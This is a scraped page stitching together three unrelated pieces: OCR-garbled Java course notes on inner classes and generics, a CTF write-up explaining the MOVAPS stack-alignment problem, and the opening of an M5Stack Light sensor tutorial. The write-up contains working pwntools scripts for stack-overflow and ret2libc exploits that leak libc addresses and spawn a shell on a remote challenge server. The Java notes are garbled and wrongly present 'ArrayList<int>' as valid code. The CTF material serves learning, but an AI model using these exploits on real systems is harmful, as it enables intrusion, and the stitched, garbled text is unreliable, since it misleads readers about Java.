Unformatted text preview: class Outer { public class PublicInner{) protected class ProtectedInner {) private class Privatelnner{) abstract class AbstractInner {J final class Finallnner {) static class StaticInner {} - Each instance of an inner class is associated with an instance of their outer class — Inner classes may not declare static initializes or static members unless they are compile time constants (i.e. static final var = value ;) f‘ — We cannot declare an interface as a member of an inner class, interfaces are never inner - Inner classes may inherit static members - The inner class can access the variables and methods declared in the outer class a- -To refer to a field or method in the outer class instance from within the inner class, use Outer.this.fldname. - If a class inherits outer class, then it can only access the members of the outer ciass but not the members of the inner class. Problem 4: The book (and the Ecture notes!) state that Java has no template mechanism. However Java 5 does. Describe how Java implements parametric polymorphism. I Solution:- Java 5 supports many pre-definaf constructs with parametric polymorphism. For egtample...'consider AmyList construct in java. If you want to create an array list which stores elements of integer type, then we can simply create an AtrayList in the following way: ., ArrayList a1 = new ArrayList <int> ( ); If you want to place an integer in the ArrayList you can simply call add () method. Similarly we can get/the integer from the ArrayList without any typecasting, by calling get () method. The functiqvélities of add () and get () methods remain same for all types of elements. ... View Full Document - Spring '10 - Dr. Thomas Click to edit the document details
https://www.coursehero.com/file/6144727/003/
CC-MAIN-2018-17
refinedweb
278
53.1
When you perfectly laid out your stack, leaked the address of libc, got the syetem address in libc, got the'/bin/sh'address, and sendline got through one step later, but you suddenly found out, what? Why did system fail? The address is also right, check it over and over, and it's all right. At this point you start to wonder if a new libc was used on Server or if there was an address acquisition error? Ten thousand questions have come up to you. But it's probably just a retn problem that stumbles you at the last step. It's The MOVAPS issue. Causes of the problem First, put on the two topics that Xiao Ming students have recently encountered: Tamilctf2021,pwn,Nameserver DownUnderCTF2021,pwn,outBackdoor Interesting little buddies can see these two topics. The two topics are very similar, both stack overflow controls eip. But! No shell!! annoying! DownUnderCTF2021-outBackdoor DownUnderCTF is much simpler and provides an outBackdoor function directly protection mechanism Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Loophole int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF buffer_init(argc, argv, envp); puts("\nFool me once, shame on you. Fool me twice, shame on me."); puts("\nSeriously though, what features would be cool? Maybe it could play a song?"); gets(v4); return 0; } int outBackdoor() { puts("\n\nW...w...Wait? Who put this backdoor out back here?"); return system("/bin/sh"); } //v4 stack structure of main -0000000000000010 var_10 db 16 dup(?) +0000000000000000 s db 8 dup(?) +0000000000000008 r db 8 dup(?) +0000000000000010 +0000000000000010 ; end of stack variables Simple, stack overflow, depending on the stack structure of main, we know that we can overwrite eip by filling in just 0x10+8 data. Is it easy? exploit is as follows: #!/usr/bin/python #coding:utf-8[/size][/align][align=left][size=3] from pwn import * context(os = 'linux', log_level='debug') local_path = './outBackdoor' addr = 'pwn-2021.duc.tf' port = 31921 is_local = 1 if is_local != 0: io = process(local_path,close_fds=True) else: io = remote(addr, port) # io = gdb.debug(local_path) elf=ELF(local_path) p_backdoor=elf.symbols['outBackdoor'] p_main = elf.symbols['main'] p_system = elf.symbols['system'] p_bin_sh = 0x4020CD p_pop_rdi = 0x040125b p_retn = 0x04011FA p_ = 0x04011E7 io.recvuntil(b"Maybe it could play a song") #Error demonstration get_shell = cyclic(16 + 8) + p64(p_backdoor) #Error demonstration # gdb.attach(io, "b * outBackdoor") gdb.attach(io, "b * main") io.sendline(get_shell) io.interactive() Interested students can check to make sure that this exp is okay (at least it looks like it is right now). But if we check it, something strange happened. The program outputs the following prompt, and it's easy to see that this prompt comes from the outBackdoor function, indicating that we did type in the outBackdoor and start executing the shell. But you can't do it no matter how you try it? Why? W...w...Wait? Who put this backdoor out back here? My solution .text:00000000004011E7 lea rdi, command ; "/bin/sh" .text:00000000004011EE mov eax, 0 .text:00000000004011F3 call _system .text:00000000004011F8 nop .text:00000000004011F9 pop rbp .text:00000000004011FA retn Replace the above error demonstration with the following and get it successfully shell p_ = 0x04011E7 get_shell = cyclic(16 + 8) + p64(p_) # This also works Ah, you are ignorant. Although you get the shell, you are still fascinated by it. Why? You didn't think about it carefully. After all, you can't get started with it and you can't understand the thinking of the great god. So the problem remains unsolved. Positive Solution Until one day, I saw the correct solution ^1 on CTFtime and felt it again. This writeup means that there is an answer to this question in this link ^2, and only one retn is needed. What! Open this link silently with the following key information: After searching the instruction movaps segfault I came across this site^3 that explains the issue. The MOVAPS issue If you're using Ubuntu 18.04 and segfaulting on a movaps instruction in buffered_vfprintf() or do_system() in the 64 bit challenges then ensure the stack is 16 byte aligned before returning to GLIBC functions such as printf() and system(). The version of GLIBC packaged with Ubuntu 18.04 uses movaps instructions to move data onto the stack in some. Simply adding a call to a ret gadget before the call to system aligned bytes, and allowed me to pop a shell. Simple summary: On 64-bit machines, when you call printf or system, make sure rsp&0xf==0, the speaker is 16-byte aligned, and the last 4 bits are 0. Errors occur when these conditions are not met. Amazing! That is to say, when I constructed payload, the stack did not meet the above conditions and offered GDB. As shown in the figure above, if the minimum 4 bits is not zero when the system function is called (in fact, the half byte is 8) So what about our own approach? Indeed, the minimum 4 bits is 0, which meets the criteria. His method, along with retn, meets the same conditions: At this time, I understand a truth: I just fool a cat into a dead mouse!!!! Let's analyze why we meet this dead mouse. The blind cat meets the dead mouse Dead-rat analysis Here's the only difference in payload, but some get shell s and others don't: get_shell = cyclic(16 + 8) + p64(p_retn) + p64(p_backdoor) get_shell = cyclic(16 + 8) + p64(p_) # This also works get_shell = cyclic(16 + 8) + p64(p_backdoor) #Error demonstration Let's make a specific analysis: We will break the retn at the time the main function returns, The retn is then executed, and the pop-up value at the top of the stack is assigned to the eip. As you can see, at this point rsp is rsp 0x7fffc8d60ec0 The next step saves the bottom of the previous stack so that after the function is executed, the last stack is restored. That is, after this step, the top rsp of our stack changes ► 0x4011d7 <outBackdoor> push rbp And this change persisted until the system call. Since then, because rsp&0xf==0 is not satisfied, fail! Okay, this dead rat has been analyzed Why did I meet? p_ = 0x04011E7 get_shell = cyclic(16 + 8) + p64(p_) # This also works Because in my solution, I controlled eip directly to 0x4011e7 in the figure above, skipping the push rbp operation perfectly, rsp met the criteria. (Don't ask me why I thought of such a "genius" idea, because I guessed it by nature.) So what is his solution? get_shell = cyclic(16 + 8) + p64(p_retn) + p64(p_backdoor) You can see that before entering the backdoor function, a retn operation was performed. The retn operation is actually to pop a unit at the top of the stack into the EIP, in this case rsp+8, so first pop up a unit, then press a unit into the backdoor function, which is not balanced! Tamilctf2021-Nameserver Occasionally, two days after DownUnderCTF began, TamilCTF came up with the same question. Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) int __cdecl main(int argc, const char **argv, const char **envp) { char buf[32]; // [rsp+0h] [rbp-20h] BYREF setbuf(_bss_start, 0LL); puts("Welcome to TamilCTF"); printf("what is you name: "); read(0, buf, 500uLL); return 0; } A typical stack overflow first leaks the libc address through puts, then finds the address of system, /bin/sh, ROP, getshell in libc. Haha, the light car is familiar with the following exp: from pwn import * from LibcSearcher import * context(log_level='debug') # context.terminal = ['terminator','-x','sh','-c'] local_path = './name-serv' addr = '3.97.113.25' port = 9001 is_local = 0 def debug(cmd): gdb.attach(io, cmd) if is_local: io = process(local_path) # debug('b * (vuln+0x121d - 0x11a2)') # debug('b * (main)') else: io = remote(addr, port) # io.recvuntil(b'what is you name: ') # payload = cyclic(500) p_pop_rdi= 0x0004006d3 elf = ELF(local_path) p_puts_plt = elf.plt['puts'] p_puts_got = elf.got['puts'] p_read_got = elf.got['read'] p_start = elf.symbols['_start'] p_main = elf.symbols['main'] p_read = elf.symbols['read'] p_bss = elf.bss() io.recvuntil(b'what is you name: ') payload = b'a'*40 + p64(p_pop_rdi) + p64(p_puts_got) + p64(p_puts_plt) + p64(p_main) io.send(payload) p_puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\x00')) print(hex(p_puts_addr)) obj = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc_base = p_puts_addr - obj.symbols['puts'] #Calculate libc base address system = libc_base+obj.symbols['system'] #Calculate the real address of each function bins = libc_base+next(obj.search(b'/bin/sh')) # gdb.attach(io, ''' # b *0x400660 # c # ''' # ) payload = b'a'*40 + p64(p_pop_rdi) + p64(bins) + p64(system) #Error demonstration io.send(payload) io.interactive() Ahha, error demonstration (journey: always thought yes) libc Something went wrong, I tried it Libcsearcher,DynELF,Don't mention crashing) # The point is that this retn was added because ''' The MOVAPS issue If you're segfaulting on a movaps instruction in buffered_vfprintf() or do_system() in the x86_64 challenges, then ensure the stack is 16-byte aligned before returning to GLIBC functions such as printf() or system(). Some versions of GLIBC uses movaps instructions to move data onto the stack in certain. ''' p_retn = 0x00400661 payload = b'a'*40 + p64(p_pop_rdi) + p64(bins) + p64(p_retn) + p64(system) Add retn, get shell. what is you name: $ ls [DEBUG] Sent 0x3 bytes: b'ls\n' [DEBUG] Received 0x26 bytes: b'flag.txt\n' b'libc.so.6\n' b'name-serv\n' b'start.sh\n' flag.txt libc.so.6 name-serv start.sh $ cat flag.txt [DEBUG] Sent 0xd bytes: b'cat flag.txt\n' [DEBUG] Received 0x27 bytes: b'TamilCTF{ReT_1s_M0rE_p0wErFu1_a5_LIBC}\n' TamilCTF{ReT_1s_M0rE_p0wErFu1_a5_LIBC} summary In this paper, The MOVAPS issue problem is explained and analyzed in combination with two related topics in DownUnderCTF2021 and TamilCTF2021. As far as the topic itself is concerned, the very simple ROP is The MOVAPS issue, which is easy to understand. Recent remarks refresh my understanding that RE examines not only the reverse technique, but also the Google and GIThub techniques; Crypto examines not only your mathematical knowledge, but also your ability to read paper s. So, what do you really think is what you think? The world is so big, go out and see more. Reference Focus on private acquisition [ Strategies for Network Security Learning]
https://programmer.help/blogs/the-movaps-issue-is-one-step-behind-a-100-step-getshell.html
CC-MAIN-2021-43
refinedweb
1,743
65.62
16 September 2008 12:40 [Source: ICIS news] By Hilde Ovrebekk LONDON (ICIS news)--The fall of US investment bank Lehman Brothers triggered fears of a lengthy downturn in the European chemicals sector on Tuesday with players seeing a possible weakening in demand and future cuts in capital expenditure. “We have been feeling the impact all year, things will just get worse,” said a nylon buyer. “Falling crude is good for raw materials but energy costs are still high and labour costs are not coming down,” the buyer added. As crude falls, demand from downstream producers may be reduced in anticipation of a further fall in raw material prices. Another possible longer-term effect would be a cut in capital expenditure as companies fail to get the funding needed to build new facilities and upgrade plants. An epichlorohydrin (ECH) and epoxy producer said: “I think we’ll have to wait and see the implications of this on the industry. “Certainly, new plants that have been commissioned two, three years ago and are due on stream now will continue to go ahead, but we might feel the shortfall of a lack of investment in a few years, which might even hinder a recovery,” the source added. Chemical companies should be prepared for a downturn even though it might not materialise, said Paul Hodges of International eChem on Monday. “We need to start planning for this,” Hodges said. “Banks will be trying to cut back loans just as companies have high working capital.” Commenting on the ?xml:namespace> “We continue to worry about asset prices, and in turn impairment risk and pro-cyclicality risk in the "Rising funding costs might also pare any asset driven margin improvements into next year." London-based bank HSBC said earlier this month that Europe's largest economy Last week, the European Commission cut its growth forecasts for Europe for 2008, as it said the The Commission, which also predicted brief recessions in GDP growth predictions were cut to 1.3% from 1.7% for the eurozone after GDP shrank in the eurozone in the April-June period for the first time since the currency bloc was created in 1999. The global financial crisis in the US deepened over the weekend with the collapse into Chapter 11 protection on Sunday of 158-year-old Lehman Brothers and the $50bn (€35bn) acquisition by Bank of America of Merrill Lynch. Three main credit rating agencies - Standard & Poor's, Moody's and Fitch - lowered AIG's credit ratings on Monday, prompting a need for the insurer to raise more capital to survive. The company’s shares plummeted 61% on Monday to $4.76. European stocks continued to fall on Tuesday, with a number of chemicals companies seeing their shares fall. The FTSEurofirst index of leading European shares was down 1.2% at 1,106.09 points, following a 3.6% drop on Monday. These recent events followed the $3,000bn federal bail-out last week of ($1 = €0.70) Julia Meehan and Stephanie Wilson contributed to this article.
http://www.icis.com/Articles/2008/09/16/9156476/lehman-brothers-fall-sparks-fears-for-europe-chems.html
CC-MAIN-2013-20
refinedweb
508
60.35
# Memory and Span pt.1 [![](https://habrastorage.org/r/w1560/webt/vh/7j/tq/vh7jtqhzbne4h3rjhprca2pruhu.png)](https://github.com/sidristij/dotnetbook) Starting from .NET Core 2.0 and .NET Framework 4.5 we can use new data types: `Span` and `Memory`. To use them, you just need to install the `System.Memory` nuget package: > `PM> Install-Package System.Memory` These data types are notable because the CLR team has done a great job to implement their special support inside the code of .NET Core 2.1+ JIT compiler by embedding these data types right into the core. What kind of data types are these and why are they worth a whole chapter? If we talk about problems that made these types appear, I should name three of them. The first one is unmanaged code. Both the language and the platform have existed for many years along with means to work with unmanaged code. So, why release another API to work with unmanaged code if the former basically existed for many years? To answer this question, we should understand what we lacked before. > ![](https://habrastorage.org/r/w1560/webt/tu/qf/aq/tuqfaqcncvjtdmb_uxgcbbzyr9o.png)This chapter was translated from Russian jointly by author and by [professional translators](https://github.com/bartov-e). You can help us with translation from Russian or English into any other language, primarily into Chinese or German. > > > > Also, if you want thank us, the best way you can do that is to give us a star on github or to fork repository [![](https://habrastorage.org/r/w1560/webt/5n/wo/6u/5nwo6uvyk2eafkzdd0cdofjqm-0.png) github/sidristij/dotnetbook](https://github.com/sidristij/dotnetbook). > > The platform developers already tried to facilitate the use of unmanaged resources for us. They implemented auto wrappers for imported methods and marshaling that works automatically in most cases. Here also belongs `stackalloc`, mentioned in the chapter about a thread stack. However, as I see it, the first C# developers came from C++ world (my case), but now they shift from more high-level languages (I know a developer who wrote in JavaScript before). This means people are getting more suspicious to unmanaged code and C/C+ constructs, so much the more to Assembler. As a result, projects contain less and less unsafe code and the confidence in the platform API grows more and more. This is easy to check if we search for `stackalloc` use cases in public repositories — they are scarce. However, let’s take any code that uses it: **Interop.ReadDir class** [/src/mscorlib/shared/Interop/Unix/System.Native/Interop.ReadDir.cs](https://github.com/dotnet/coreclr/blob/b29f6328510207970763580d6f4db864e4b198af/src/mscorlib/shared/Interop/Unix/System.Native/Interop.ReadDir.cs#L71-L83) ``` unsafe { // s_readBufferSize is zero when the native implementation does not support reading into a buffer. byte* buffer = stackalloc byte[s_readBufferSize]; InternalDirectoryEntry temp; int ret = ReadDirR(dir.DangerousGetHandle(), buffer, s_readBufferSize, out temp); // We copy data into DirectoryEntry to ensure there are no dangling references. outputEntry = ret == 0 ? new DirectoryEntry() { InodeName = GetDirectoryEntryName(temp), InodeType = temp.InodeType } : default(DirectoryEntry); return ret; } ``` We can see why it is not popular. Just skim this code and question yourself whether you trust it. I guess the answer is ‘No’. Then, ask yourself why. It is obvious: not only do we see the word `Dangerous`, which kind of suggests that something may go wrong, but there is the `unsafe` keyword and `byte* buffer = stackalloc byte[s_readBufferSize];` line (specifically — `byte*`) that change our attitude. This is a trigger for you to think: “Wasn’t there another way to do it”? So, let’s get deeper into psychoanalysis: why might you think that way? On the one hand, we use language constructs and the syntax offered here is far from, for example, C++/CLI, which allows anything (even inserting pure Assembler code). On the other hand, this syntax looks unusual. The second issue developers thought of implicitly or explicitly is incompatibility of string and char[] types. Although, logically a string is an array of characters, but you can’t cast a string to char[]: you can only create a new object and copy the content of a string to an array. This incompatibility is introduced to optimize strings in terms of storage (there are no readonly arrays). However, problems appear when you start working with files. How to read them? As a string or as an array? If you choose an array you cannot use some methods designed to work with strings. What about reading as a string? It may be too long. If you need to parse it then, what parser should you choose for primitive data types: you don’t always want to parse them manually (integers, floats, given in different formats). We have a lot of proven algorithms that do it quicker and more efficiently, don’t we? However, such algorithms often work with strings that contain nothing but a primitive type itself. So, there is a dilemma. The third problem is that the data required by an algorithm rarely make a continuous, solid data slice within a section of an array read from some source. For example, in case of files or data read from a socket, we have some part of those already processed by an algorithm, followed by a part of data that must be processed by our method, and then by not yet processed data. Ideally, our method wants only the data for which this method was designed. For example, a method that parses integers won’t be happy with a string that contains some words with an expected number somewhere among them. This method wants a number and nothing else. Or, if we pass an entire array, there is a requirement to indicate, for example, the offset for a number from the beginning of the array. ``` int ParseInt(char[] input, int index) { while(char.IsDigit(input[index])) { // ... index++; } } ``` However, this approach is poor, as this method gets unnecessary data. In other words *the method is called for contexts it was not designed for*, and has to solve some external tasks. This is a bad design. How to avoid these problems? As an option we can use the `ArraySegment` type that can give access to a section of an array: ``` int ParseInt(IList[] input) { while(char.IsDigit(input.Array[index])) { // ... index++; } } var arraySegment = new ArraySegment(array, from, length); var res = ParseInt((IList)arraySegment); ``` However, I think this is too much both in terms of logic and a decrease in performance. `ArraySegment` is poorly designed and slows the access to elements 7 times more in comparison with the same operations done with an array. So how do we solve these problems? How do we get developers back to using unmanaged code and give them a unified and quick tool to work with heterogeneous data sources: arrays, strings and unmanaged memory. It was necessary to give them a sense of confidence that they can’t do a mistake unknowingly. It was necessary to give them an instrument that doesn’t diminish native data types in terms of performance but solves the listed problems. `Span` and `Memory` types are exactly these instruments. Span, ReadOnlySpan ------------------ `Span` type is an instrument to work with data within a section of a data array or with a subrange of its values. As in case of an array it allows both reading and writing to the elements of this subrange, but with one important constraint: you get or create a `Span` only for a *temporary* work with an array, Just to call a group of methods. However, to get a general understanding let’s compare the types of data which `Span` is designed for and look at its possible use scenarios. The first type of data is a usual array. Arrays work with `Span` in the following way: ``` var array = new [] {1,2,3,4,5,6}; var span = new Span(array, 1, 3); var position = span.BinarySearch(3); Console.WriteLine(span[position]); // -> 3 ``` At first, we create an array of data, as shown by this example. Next, we create `Span` (or a subset) which references to the array, and makes a previously initialized value range accessible to code that uses the array. Here we see the first feature of this type of data i.e. the ability to create a certain context. Let’s expand our idea of contexts: ``` void Main() { var array = new [] {'1','2','3','4','5','6'}; var span = new Span(array, 1, 3); if(TryParseInt32(span, out var res)) { Console.WriteLine(res); } else { Console.WriteLine("Failed to parse"); } } public bool TryParseInt32(Span input, out int result) { result = 0; for (int i = 0; i < input.Length; i++) { if(input[i] < '0' || input[i] > '9') return false; result = result \* 10 + ((int)input[i] - '0'); } return true; } ----- 234 ``` As we see `Span` provides abstract access to a memory range both for reading and writing. What does it give us? If we remember what else we can use `Span` for, we will think about unmanaged resources and strings: ``` // Managed array var array = new[] { '1', '2', '3', '4', '5', '6' }; var arrSpan = new Span(array, 1, 3); if (TryParseInt32(arrSpan, out var res1)) { Console.WriteLine(res1); } // String var srcString = "123456"; var strSpan = srcString.AsSpan(); if (TryParseInt32(strSpan, out var res2)) { Console.WriteLine(res2); } // void \* Span buf = stackalloc char[6]; buf[0] = '1'; buf[1] = '2'; buf[2] = '3'; buf[3] = '4'; buf[4] = '5'; buf[5] = '6'; if (TryParseInt32(buf, out var res3)) { Console.WriteLine(res3); } ----- 234 234 234 ``` That means `Span` is a tool to unify ways of working with memory, both managed and unmanaged. It ensures safety while working with such data during Garbage Collection. That is if memory ranges with unmanaged resources start to move, it will be safe. However, should we be so excited? Could we achieve this earlier? For example, in case of managed arrays there is no doubt about it: you just need to wrap an array in one more class (e.g. long-existing [ArraySegment] (<https://referencesource.microsoft.com/#mscorlib/system/arraysegment.cs,31>)) thus giving a similar interface and that is it. Moreover, you can do the same with strings — they have necessary methods. Again, you just need to wrap a string in the same type and provide methods to work with it. However, to store a string, a buffer and an array in one type you will have much to do with keeping references to each possible variant in a single instance (with only one active variant, obviously). ``` public readonly ref struct OurSpan { private T[] \_array; private string \_str; private T \* \_buffer; // ... } ``` Or, based on architecture you can create three types that implement a uniform interface. Thus, it is not possible to create a uniform interface between these data types that is different from `Span` and keep the maximum performance. Next, there is a question of what is `ref struct` in respect to `Span`? These are exactly those “structures existing only on stack” that we hear about during job interviews so often. It means this data type can be allocated on the stack only and cannot go to the heap. This is why `Span`, which is a ref structure, is a context data type that enables work of methods but not that of objects in memory. That is what we need to base on when trying to understand it. Now we can define the `Span` type and the related `ReadOnlySpan` type: > Span is a data type that implements a uniform interface to work with heterogeneous types of data arrays and enables passing a subset of an array to a method so that the speed of access to the original array would be constant and highest regardless of the depth of the context. Indeed, if we have a code like ``` public void Method1(Span buffer) { buffer[0] = 0; Method2(buffer.Slice(1,2)); } Method2(Span buffer) { buffer[0] = 0; Method3(buffer.Slice(1,1)); } Method3(Span buffer) { buffer[0] = 0; } ``` the speed of access to the original buffer will be the highest as you work with a managed pointer and not a managed object. That means you work with an unsafe type in a managed wrapper, but not with a .NET managed type. > ![](https://habrastorage.org/r/w1560/webt/tu/qf/aq/tuqfaqcncvjtdmb_uxgcbbzyr9o.png)This chapter was translated from Russian jointly by author and by [professional translators](https://github.com/bartov-e). You can help us with translation from Russian or English into any other language, primarily into Chinese or German. > > > > Also, if you want thank us, the best way you can do that is to give us a star on github or to fork repository [![](https://habrastorage.org/r/w1560/webt/5n/wo/6u/5nwo6uvyk2eafkzdd0cdofjqm-0.png) github/sidristij/dotnetbook](https://github.com/sidristij/dotnetbook). > >
https://habr.com/ru/post/443974/
null
null
2,123
55.44
glob, globfree— #include <glob.h> int glob(const char *pattern, int flags, const int (*errfunc)(const char *, int), glob_t *pglob); void globfree(glob_t *pglob)()). The following values may also be included in flags, however, they are non-standard extensions to IEEE Std 1003.2 (“POSIX.2”). GLOB_ALTDIRFUNC glob() to use to open, read, and close directories and to get stat information on names found in those directories: {pat,pat,...}’ strings like csh(1). The pattern ‘ {}’ is left unexpanded for historical reasons. (csh(1) does the same thing to ease typing of find(1) patterns.) GLOB_KEEPSTAT struct stat **gl_statv; This option may be used to avoid lstat(2) lookups in cases where they are expensive.. If(). The arguments pglob->gl_pathc and pglob->gl_pathv are still set as specified above.);. LC_COLLATElocale(1) category can affect the sort order; see CAVEATS in setlocale(3) for details. PATH_MAXmay cause unchecked errors.
https://man.openbsd.org/glob.3
CC-MAIN-2019-22
refinedweb
147
67.86
[solved] MYSQL plugin is installed, but I can't connect to local database Hi!I need to connect with my Qt application to a MySql database. So I compiled MySql plugin for Qt, and put result file (libqsqlmysql.so) into QT's plugins directory. It seems to work. I installed Xampp to run a local Mysql database, and i created a database named "Test". It seems to work. I modified the example project in QT, "Masterdetail (Music Archive) to connect with local database. I modified only the "database.h" file like this: @ #ifndef DATABASE_H #define DATABASE_H #include <QMessageBox> #include <QSqlDatabase> #include <QSqlError> #include <QSqlQuery> static bool createConnection() { QSqlDatabase db = QSqlDatabase::addDatabase("QMYSQL"); db.setHostName("localhost"); db.setDatabaseName("Test"); db.setUserName("root"); db.setPassword("123456"); if (!db.open()) { qDebug() << db.lastError(); QMessageBox::critical(0, qApp->tr("Cannot open database"), qApp->tr("ERROR!.\n" "This example needs SQLite support. Please read " "the Qt SQL driver documentation for information how " "to build it.\n\n" "Click Cancel to exit."), QMessageBox::Cancel); return false; } @ I receive this error: QSqlError(2002, "QMYSQL: Unable to connect", "Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)") Where am I wrong?thanks O.S Ubuntu 10 QT.Qt Creator 2.0.1 Based on Qt 4.7.0 (32 bit) Is your mysqld actually running? Can you connect on the command line? Check with @ mysql -u root -p -h localhost Test @ I found the solution here: "Your text to link here...": In particular, I didn't have this folder " /var/run/mysqld" so i typed @sudo mkdir /var/run/mysqld @ and then @ sudo ln -s /opt/lampp/var/mysql/mysql.sock /var/run/mysqld/mysqld.sock @ As explained in post, and after this it worked! Thanks Volker for reply. Your command returns this message: @ Program "mysql" can be found in this packages: - mysql-client-core-5.1 - mysql-cluster-client-5.1 Try: sudo apt-get install <SELECTED PACKAGE> @
https://forum.qt.io/topic/3547/solved-mysql-plugin-is-installed-but-i-can-t-connect-to-local-database
CC-MAIN-2018-17
refinedweb
327
53.47
Content Count7 Joined Last visited Community Reputation7 Newbie About Cameron Knight - RankNewbie Recent Profile Visitors The recent visitors block is disabled and is not being shown to other users. - Cameron Knight started following ScrollTrigger ScrollTrigger Cameron Knight commented on GreenSock's product in PluginsThis is absolutely incredible! Thanks Greensock team for all your hard work! 👏👏👏 - You guys rock @GreenSock. Thanks for your help. After playing around with the animation and digging through some forums, I found the solution! I had to add the following CSS to the element that was flickering and it stopped the flickering in Safari 🥳 -webkit-transform-style: preserve-3d - Hi @ZachSaucier, Thanks so much for the quick reply. I'll do what you suggested and start stripping back a few elements to see what the issue is. Appreciate the feedback. - Cameron Knight started following Page transition with GSAP and Barba.js and GSAP animation flashing in safari}); - I finally got a simple transition working with gsap 3 & barba V2! 🎉 The transition function that worked for me looks like this: function leaveAnimation(container) { return new Promise(async resolve => { await gsap .to(container, { duration: 1, opacity: 0, }) .then(); resolve(); }); } One really simple thing that took me a while to figure out was making the enter animation work. This was fixed by just adding css to make the barba container positioned absolute: .container { position: absolute; left: 0; top: 0; width: 100%; } I'm going to leave this working example here incase anyone else needs it to reference from. - Hey @ZachSaucier, really appreciate the quick response. The GSAP community is the bee's knees. Love it. I did make a post at Barba a few days ago so I'll wait to hear back from them. If I have any luck I'll post a working example here. Cameron Knight changed their profile photo - Hey gang. I've been trying to get a simple page transition working using GSAP 3 and Barba.js V2 for some time now but not having any luck. All the docs and examples out there haven't seemed to help me with the latest versions. I'm not a great developer but it's become my life long goal to one day solve this I've tried 2 methods below (onComplete and .then) but no dice. I'd appreciate any help I can get! Thank you! See the full code on codesandbox.io function leaveAnimation(e) { var done = this.async(); gsap.to(e, 1, { opacity: 0, onComplete: done }); } function enterAnimation(e) { return new Promise(resolve => { gsap.to(e, 2, { opacity: 1 }).then(resolve()); }); } barba.use(barbaPrefetch); barba.init({ debug: true, transitions: [ { name: "one-pager-transition", to: { namespace: ["one-pager"] }, sync: true, leave: data => leaveAnimation(data.current.container), enter: ({ next }) => enterAnimation(next.container) } ] });
https://greensock.com/profile/78004-cameron-knight/
CC-MAIN-2020-29
refinedweb
457
58.69
Forum:Why do my pages keep on disappearing From Uncyclopedia, the content-free encyclopedia Forums: Index > Village Dump > Why do my pages keep on disappearing Note: This topic has been unedited for 1240 days. It is considered archived - the discussion is over. Do not add to unless it really needs a response. Mellorman 11:24, 23 June 2007 (UTC) i put my info on a new page and then it goes abo0ut 30 secs later - Depends on the quality of the contributions. What articles are you talking about? -- Sir Mhaille (talk to me) - If it's pie or cake then it's likely to be eaten my over-zealous adminicastrators. Seriously though, make the article longer than a paragraph on the first edit or it'll likely be deleted, as you seem to have experienced. -- Hindleyite Converse 11:20, 24 June 2007 (UTC) - Don't put INFO on it man, that is just about as bad as facts of truth. Uncyclopedia's database runs on the LieSQL server system and therefor can not stand that. --Vosnul 13:32, 24 June 2007 (UTC) - Well, I looked at your contributions to try to see just what it is that you're talking about. The contribs show...this page and only this page. As this is your only contribution, and it's still here, I am forced to call shenanigans. Of course, you may have contributed without signing in first, but that path leads to madness, so I'm going to pretend that I never said that. Lastly, shenanigans! Sir Modusoperandi Boinc! 15:27, 24 June 2007 (UTC) - No no no, This here is clearly a case of tomfoolery, no need to call shenanigans--Vosnul 15:35, 24 June 2007 (UTC) - I had this down as a case of rampant asshatery, we can't all be right. -- Sir Mhaille (talk to me) - It's probably the Spanish flu or dysentery. Consider investing in a butt plug, or something. -- 17:46, 24 June 2007 (UTC) - Funny thing that you should mention butt plugs, good sir. /me opens briefcase. Are you continually disappointed by mediocre, knockoff butt plugs? Sure, you know the kind; they say "made in China" on the side and they smell like burning tires. Well, son, have I got the product for you. Made right here in the good ol' US of A... Sir Modusoperandi Boinc! 18:37, 24 June 2007 (UTC - I think I've experienced that one before. Would that be the Big Mac? That plugs your butt up real good, and you don't even need to insert it! Or perhaps that was my boycott of fiber that did it. In any case, I have to go. I'm in excruciating pain and wishing that I'd stuck with the Chinese ones.-Sir Ljlego, GUN VFH FIYC WotM SG WHotM PWotM AotM EGAEDM ANotM + (Talk) 01:23, 25 June 2007 (UTC) Tips on avoiding deletion I got a tip on avoiding articals being deleted is while you are in the middle of creating an artical is to put them in your namespace like this [[User:Mr Example/Example Article]]. And to recover articals is to aks a good administrator like Braydie Haskell. as he did for me he even put it in my userspace . note dont let his holiday notice deter you as he more than willing to help .Richardson j 23:06, 25 June 2007 (UTC)
http://uncyclopedia.wikia.com/wiki/Forum:Why_do_my_pages_keep_on_disappearing?t=20130516091057
CC-MAIN-2016-44
refinedweb
568
81.73
From: Daniel Frey (daniel.frey_at_[hidden]) Date: 2003-09-09 07:47:56 John Maddock wrote: > It seems to me that this may be of interest here as well: > >>The interesting thing is, this is actually implementable right now within >>the current language - I've attached a sample implementation to the end of >>this message, hopefully it really is legal code, although I admit that I think your code is great as it isn't an intrusive approach at first sight: No need to flag your class to be swappable. OTOH you need to provide a swap function, so you have to take into account that the class needs to support it anyway by some code. Some classes might not do that with a member function swap, but with a friend function that has two arguments. Also, most classes that have a member-function also provide a free function with two parameters resolving to the member functions. That given, this might also be a reasonable implementation which might work on more compilers today: namespace boost { template< typename T > inline void swap( T& lhs, T& rhs ) { using std::swap; swap( lhs, rhs ); } } ADL should find the better match if T provides a swap(T&,T&), otherwise the default from std:: will be used. The question is IMHO which requirements to T (in a namespace N) we request: void N::T::swap( T& ); or void N::swap( T&,
https://lists.boost.org/Archives/boost/2003/09/52767.php
CC-MAIN-2021-39
refinedweb
236
56.32
Lesson 21.1. UNITS. LIGHT The purpose of this lesson Hi! Today we will get acquainted with the light units and learn to determine the presence of light (figure 1). Figure 1 This lesson will teach you how to obtain and process digital data about the presence of a light source. Short help - Purpose: used to determine the presence of a light source - Scope: agriculture, science and home life - Connection interface: I /O (b port slot connector) Supply voltage: 5 V - Compatibility: M5 fire - Form factor: LEGO compatible Brief overview Light is one of a large family of additional modules (blocks) designed primarily for M5 fire. This module Comes in a plastic box. The kit includes an excellent cable (15 cm) with installed groove plugs (figure 2). On the front side of the sensor there is a sticker with the name of the module and the designation of contacts. Interestingly, the sensor can operate in two modes: analog and digital. Figure 2 In order to set the trigger threshold for the digital output, there is a trimmer resistor motor on the back of the sensor (figure 3), which can be rotated with a screwdriver. Figure 3 Overall dimensions of the sensor are ridiculous, and the problems with installation is not (figure 4) :) Figure 4 The sensor Is connected directly to the above M5 port using 